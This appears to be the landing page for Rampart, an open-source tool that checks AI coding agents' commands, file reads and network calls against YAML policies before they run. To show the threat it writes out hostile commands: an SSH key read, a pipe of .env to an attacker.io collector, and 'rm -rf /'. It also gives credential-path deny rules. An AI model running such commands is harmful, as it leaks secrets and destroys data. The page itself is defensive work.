v0.9.19 · Codex and OpenClaw hardening Open Source · Apache 2.0 GitHub repo

Your agent has root.
That's the problem.

Rampart sits between your agent and your system. Every command, file access, and network request is evaluated against your YAML policy before it executes. One Go binary. No cloud. No latency your agent can feel.

$ curl -fsSL https://rampart.sh/install | bash click to copy

Install → View Source

Claude CodeCodex CLIOpenClawMCPLinux · macOS · Windows

rampart watch · agent-01

● live

✔execgit status

✔execnpm install express

ASKexeckubectl apply -f deploy.yaml

●read~/.ssh/id_rsa

●execrm -rf /

The agent keeps building. The dangerous stuff stops before it runs.

The real threat

What your agent can do right now

Claude Code's --dangerously-skip-permissions. Codex's --full-auto mode. Fast agent workflows increasingly assume full local trust. Here's what that actually means.

$ cat ~/.ssh/id_rsa

$ cat .env | curl -X POST https://attacker.io/collect -d @-

$ rm -rf /

No guardrail in the execution path. No approval gate. No tamper-evident audit trail after the fact.

Linux: strongest path

LD_PRELOAD, wrappers, hooks, and file/network policy enforcement are the happy path.

macOS: works, with caveats

DYLD_INSERT_LIBRARIES has SIP boundaries. Homebrew/user-installed binaries work best.

Windows: hooks, not preload

Use Claude/Cline/API/MCP-style integrations. Codex preload/wrap and OpenClaw plugin setup are not the Windows story.

A different approach

Your agent needs real access to do real work.
It just shouldn't have access to everything.

Sandboxes are useful, but they often block npm install, git clone, and the API calls your agent needs to finish the job. Rampart keeps the workflow moving and blocks credential reads, exfiltration, and destructive commands.

Sandbox approach

Lock everything, allow a few things

Agent can't install deps, run tests, or hit your staging API. Secure, but you fight the sandbox to get work done.

$ sandbox --allow ./project -- agent
✗ npm install        # denied
✗ pytest --db-url ... # denied
✗ curl staging.api    # denied

Rampart approach

Allow everything, block the dangerous stuff

Agent works normally. Rampart only intervenes on credential access, exfiltration, and destructive commands.

$ rampart setup claude-code
✔ npm install        # allowed
✔ pytest --db-url ... # allowed
✗ cat ~/.ssh/id_rsa   # denied

How enforcement works

Rampart does not ask the agent to behave.

It sits in the execution path. Every command, file read, network request, and MCP call is evaluated before it runs. Most requests pass in microseconds. Risky ones are denied, held for approval, or redacted before secrets reach the model.

requestAgent asks for a tool callexec · file.read · network · MCPnormalize

policyYAML rules evaluate locallyscope, command, path, URL, response patterns8µs

decisionAllow, ask, deny, or redactnormal dev continues; risky actions pause or stopask

auditHash-chained JSONL recordevery allow, ask, deny, and redaction is written locallyverify

A seatbelt, not a cage

Your agent can still build.

It can install dependencies, run tests, clone repos, and call the APIs you allow. It just cannot quietly read ~/.ssh/id_rsa, post .env to a tunnel, or rewrite its own policy.

Allow

Normal development keeps moving

npm install, go test ./..., and git status stay fast because common safe actions are pattern-matched locally.

Ask

Risky production actions pause

Rules with action: ask hold commands like kubectl apply until a human decides.

Deny

Secrets and destruction stop cold

Credential reads, exfiltration patterns, destructive shell commands, and policy self-modification are blocked before execution.

Response scanning

Most tools stop at the request. Rampart also scans the response.

If a file read would put credentials into the agent's context window, the response is blocked before the model ever sees it. That matters when the dangerous thing is not the read itself, but what comes back.

Agent reads .envThe file access is normalized as a tool response, not just a path.

Credential pattern detectedAWS_SECRET_ACCESS_KEY, private keys, tokens, and similar secrets match local policy.

Response blocked before contextThe agent receives the policy decision, not the secret value.

Works with your agent

Claude Code, Codex CLI, Cline, OpenClaw, MCP.

Use the native setup where Rampart knows the agent. Use wrapping or the MCP proxy everywhere else.

Claude Coderampart setup claude-codehooks + bridgenative

Codex CLIrampart setup codexwrapper + preloadnative

Clinerampart setup clinehooksnative

OpenClawrampart setup openclaw --pluginplugin + shimnative

Any agentrampart wrap -- <cmd>shimuniversal

MCP serversrampart mcp -- <server>proxyuniversal

Policy as code

It's just YAML.

No SDK, no cloud console, no proprietary rule builder. Use the built-in profile, or write the exact rule you want reviewed before a tool call runs.

~/.rampart/policies/standard.yaml

version: "1"
policies:
  - name: block-credential-leak
    match:
      tool: file.read
    rules:
      - when:
          path_matches:
            - "**/.env"
            - "**/.ssh/*"
            - "**/id_rsa"
        action: deny
        message: "Credential access blocked"

  - name: ask-before-production
    match:
      tool: exec
    rules:
      - when:
          command_matches: ["kubectl apply *"]
        action: ask

Ecosystem

Rampart blocks. Snare catches.

Rampart

Stops unsafe agent actions before they run. It protects the execution path: commands, file reads, network calls, and MCP tools.

Snare

Plants credential canaries so you know when something escaped anyway. It tells you when your assumptions failed.

One blocks the action. The other proves when a secret was used.

Start protecting your agents

Install in seconds. No account, no API key, no cloud dependency.